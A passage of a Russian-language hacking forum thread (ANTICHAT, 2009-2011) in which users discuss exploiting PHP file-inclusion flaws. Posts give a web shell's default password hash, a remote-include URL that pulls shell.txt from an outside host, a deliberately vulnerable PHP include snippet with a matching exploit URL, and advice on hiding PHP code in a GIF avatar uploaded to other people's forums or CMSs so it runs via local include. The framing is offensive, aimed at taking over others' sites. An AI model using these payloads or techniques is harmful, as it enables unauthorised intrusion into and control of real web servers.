HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #61  
Старый 11.11.2009, 01:13
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691

Репутация: 330
По умолчанию

да
 

  #62  
Старый 11.11.2009, 01:20
B1t.exe
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708

Репутация: 208


По умолчанию

а там пароль по умолчанию не знаю ( только есть хэш: 63a9f0ea7bb98050796b649e85481845

а зачем папка WSOmanager ? там что ?
кстати, а как тогда направить инклюд, если этот шелл требует авторизацию?
темно как то мне ....
 

  #63  
Старый 11.11.2009, 01:22
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691

Репутация: 330
По умолчанию

root пароль, там комент должен быть:
63a9f0ea7bb98050796b649e85481845 // root
как то так, не помню точно.
И хватит оффтопить в теме.
 

  #64  
Старый 12.11.2009, 22:52
B0o0M
Участник форума
Регистрация: 03.08.2009
Сообщений: 103
Провел на форуме:
413428

Репутация: 13
По умолчанию

index.php?page=http://nabstre.tu2.ru/shell.txt? вот почему в конце ? никак не пойму,
если можно то плиссс с примером исходного кода
 

  #65  
Старый 12.11.2009, 22:56
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Цитата:
Сообщение от B0o0M  
index.php?page=http://nabstre.tu2.ru/shell.txt? вот почему в конце ? никак не пойму,
если можно то плиссс с примером исходного кода

http://forum.antichat.ru/thread23501.html

см Примечания к перовму разделу
 

  #66  
Старый 12.11.2009, 23:18
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691

Репутация: 330
По умолчанию

Бум, елементарный пример:

PHP код:
<?
$re 
$_GET['re'];
include(
$re.".php");
?>
Цитата:
localhost/script.php?re=http://localhost/shell.txt?
 

  #67  
Старый 13.06.2011, 02:07
Static
Guest
Сообщений: n/a
Провел на форуме:
4285

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
Можно залить gif картинку и поместить в конец простенький шелл подставить
Код:
Code:
php highlight:
при инклуде картинки она проинклудится не как картинка а как php код...
прочел на форуме одном

можете подробней описать сей процесс ? ни как дойти не может
 

  #68  
Старый 13.06.2011, 02:11
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Смотри... У тебя есть локальный инклуд. Твоя задача - подставить туда такой файл, чтобы выполнялся твой код. Ищешь какие-нибудь форумы, cms'ки и т.д. Регаешься там. И заливаешь туда картинку как аватарку. Но до этого в конец этой картинки вставляешь свой код. Таким образом, проинклудив эту аватарку, у тебя есть выполняется твой evil-code.
 

  #69  
Старый 13.06.2011, 02:27
Static
Guest
Сообщений: n/a
Провел на форуме:
4285

Репутация: 0
По умолчанию

Вот так я вижу gif-ку с блокнота.

Код:
Code:
??

Принцип работы уязвимости понял. С картинкой вопрос только. Че да как редактировать.
 

  #70  
Старый 13.06.2011, 02:45
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691

Репутация: 330
По умолчанию

а что не ясного то?

открыл блокнотом, запихнул, сохранил.
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP 186 21.02.2010 02:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ